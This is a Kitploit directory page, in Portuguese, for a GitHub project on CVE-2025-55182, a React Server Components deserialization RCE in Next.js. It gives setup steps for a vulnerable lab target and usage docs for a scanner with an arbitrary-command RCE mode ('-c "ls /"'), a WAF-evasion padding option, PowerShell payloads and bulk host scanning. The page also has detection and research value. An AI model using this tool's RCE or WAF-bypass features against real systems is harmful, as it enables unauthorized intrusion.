Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182 — CVE-2025-55182(React Server Components 反序列化远程代码执行漏洞) | Kitploit
Ferramentas/GitHubGitHub/xiaolvchen/cve-2025-55182
Vulnerability ScannersPayload GenerationExploitationWeb Application ExploitationWAF BypassPenetration Testing
GitHubxiaolvchen/cve-2025-55182

CVE-2025-55182

CVE-2025-55182(React Server Components 反序列化远程代码执行漏洞)

Ver Repositório
1há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Versões Afetadas

ComponenteVersão recomendada para reproduçãoFaixa de versões vulneráveis
Node.js>= 20.9.020.9.0 (LTS) e superiores
Next.js15.0.015.x, 16.x (App Router)
React Core19.0.0 ou 19.2.019.0.0 a 19.2.0
RSC Bundlerreact-server-dom-webpack19.0.0 a 19.2.0

Construção e Inicialização

  1. Forçar instalação de versão inferior

    root@kitploit:~
    cd cve-2025-55182-target
    npm install --force
    
  2. Verificar versões das dependências

    root@kitploit:~
    npm list react next
    # Confirmar que a saída mostra [email protected] e [email protected]
    

    Desde que a lista de dependências de nível superior mostre [email protected] e [email protected], o ambiente foi travado com sucesso em um estado vulnerável. Ignore os avisos e códigos de erro aqui.

  3. Construir:

    root@kitploit:~
    npm run build
    
  4. Executar:

    root@kitploit:~
    npm start
    

    O servidor escutará em http://localhost:3000. Ambiente configurado, pode iniciar a validação da vulnerabilidade.

Exemplos

  • Detecção/varredura de vulnerabilidade:

    root@kitploit:~
    cd React2shell
    python3 scanner.py -u http://127.0.0.1:3000/
    
  • RCE:

    root@kitploit:~
    python3 scanner_with_rce.py -u http://127.0.0.1:3000/ -c "ls /"
    

poc

Referências

react2shell-scanner

Uma ferramenta de linha de comando para detectar as vulnerabilidades CVE-2025-55182 e CVE-2025-66478 do React Server Components (RSC) em aplicações Next.js.

Para uma introdução detalhada sobre os detalhes técnicos da vulnerabilidade e métodos de detecção, consulte nosso artigo do blog: https://slcyber.io/research-center/high-fidelity-detection-mechanism-for-rsc-next-js-rce-cve-2025-55182-cve-2025-66478

Como funciona

Por padrão, o scanner envia uma requisição POST multiparte especialmente criada contendo um payload de verificação RCE que executa uma operação matemática determinística (41*271 = 11111). Um host vulnerável retornará o resultado do cálculo no cabeçalho de resposta X-Action-Redirect na forma de /login?a=11111.

O scanner testa primeiro o caminho raiz. Se o caminho raiz não for vulnerável, ele segue redirecionamentos de mesma origem (por exemplo, de / para /en/) e testa o destino do redirecionamento. Redirecionamentos entre domínios não são seguidos.

Modo de detecção segura

Use a flag --safe-check para ativar o modo de detecção segura, que depende de sinais indiretos (como código de status 500 e resumos de erro específicos) sem executar código no alvo. Use este modo quando não desejar executar RCE.

Bypass de WAF

Usar a flag --waf-bypass adiciona dados aleatórios de preenchimento antes do corpo da requisição multiparte. Isso ajuda a contornar a detecção de WAFs que analisam apenas o início do corpo da requisição. O tamanho padrão é 128KB, configurável com --waf-bypass-size. Quando o bypass de WAF está ativado, o tempo limite é automaticamente aumentado para 20 segundos (a menos que seja definido explicitamente).

Modo Windows

Usar a flag --windows altera o payload de Unix shell (echo $((41*271))) para PowerShell (powershell -c "41*271"), adequado para alvos executando Windows.

Requisitos de ambiente

  • Python 3.9+
  • requests
  • tqdm

Instalação

root@kitploit:~
pip install -r requirements.txt

Modo de uso

Escaneando um único host:

root@kitploit:~
python3 scanner.py -u https://example.com

Escaneando uma lista de hosts:

root@kitploit:~
python3 scanner.py -l hosts.txt

Escaneando com multithreading e salvando resultados:

root@kitploit:~
python3 scanner.py -l hosts.txt -t 20 -o results.json

Escaneando com cabeçalhos personalizados:

root@kitploit:~
python3 scanner.py -u https://example.com -H "Authorization: Bearer token" -H "Cookie: session=abc"

Usando detecção indireta segura:

root@kitploit:~
python3 scanner.py -u https://example.com --safe-check

Escaneando alvos Windows:

root@kitploit:~
python3 scanner.py -u https://example.com --windows

Escaneando com bypass de WAF:

root@kitploit:~
python3 scanner.py -u https://example.com --waf-bypass

Executando comando RCE:

root@kitploit:~
python3 scanner.py -u https://example.com -c "ls /"

Descrição das opções

root@kitploit:~
-u, --url         URL único a verificar
-c, --cmd         Comando a executar
-l, --list        Arquivo contendo hosts (um por linha)
-t, --threads     Número de threads simultâneas (padrão: 10)
--timeout         Tempo limite da requisição (segundos, padrão: 10)
-o, --output      Arquivo de saída para salvar resultados (formato JSON)
--all-results     Salvar todos os resultados, não apenas hosts vulneráveis
-k, --insecure    Desabilitar verificação SSL
-H, --header      Cabeçalho personalizado (pode ser usado várias vezes)
-v, --verbose     Mostrar detalhes da resposta de hosts vulneráveis
-q, --quiet       Exibir apenas hosts vulneráveis
--no-color        Desabilitar saída colorida
--safe-check      Usar detecção indireta segura em vez de RCE PoC
--windows         Usar payload do Windows PowerShell em vez de Unix shell
--waf-bypass      Adicionar dados de preenchimento para contornar detecção de WAF
--waf-bypass-size Tamanho dos dados de preenchimento (KB, padrão: 128)

Agradecimentos

O RCE PoC foi originalmente divulgado publicamente por @maple3142 — somos muito gratos pela contribuição deles ao publicar um PoC funcional.

Esta ferramenta foi originalmente construída para detectar com segurança este RCE. Esta funcionalidade ainda está disponível através do modo de detecção segura --safe-check.

  • Assetnote Security Research Team - Adam Kues, Tomais Williamson, Dylan Pindur, Patrik Grobshäuser, Shubham Shah
  • xEHLE_ - Refletir saída RCE no cabeçalho de resposta
  • Nagli

Saída

Os resultados são exibidos no terminal. Ao usar o parâmetro -o, os hosts vulneráveis são salvos em um arquivo JSON, contendo a requisição e resposta HTTP completas para verificação.

Baixar ferramenta